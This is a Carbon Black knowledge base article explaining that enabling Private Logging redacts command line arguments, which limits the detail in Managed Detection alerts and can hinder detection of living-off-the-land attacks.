logo

Knowledge Base

Access official resources from Carbon Black experts

IMPORTANT ANNOUNCEMENT: On May 6, 2024, Carbon Black User eXchange (UeX) and Case Management will move to a new platform!
The Community will be in read-only mode starting April 19th, 7:00 AM PDT. Check out the blog post!
You will still be able to use the case portal to create and interact with your support cases until the transition, view more information here!

Managed Detection: Does Enabling Private Logging Cause the Sent Alerts to Contain Less Information?

Managed Detection: Does Enabling Private Logging Cause the Sent Alerts to Contain Less Information?

Environment

  • CBC Web Console: All Versions
  • Managed Detection

Question

Does enabling Private Logging in a CBC policy cause the alerts sent from the Managed Detection team to contain less information?

Answer

Enabling Private Logging within a policy can prevent the Managed Detection team from sending much of the useful information obtained from an alert - thereby limiting the scope of the Manage Detection alerts.

Additional Notes

  • The most important IOC being considered by the Managed Detection team is typically the command line argument, which is redacted if Private Logging is enabled.
  • Enabling Private Logging can prevent the Managed Detection team from identifying "living off the land" attacks.

Related Content


Was this article helpful? Yes No
100% helpful (1/1)
Article Information
Author:
CB_Support
Creation Date:
‎09-09-2020
Views:
697
Contributors
logo

Copyright © 2005-2023 Broadcom. All Rights Reserved. The term “Broadcom” refers to Broadcom Inc. and/or its subsidiaries.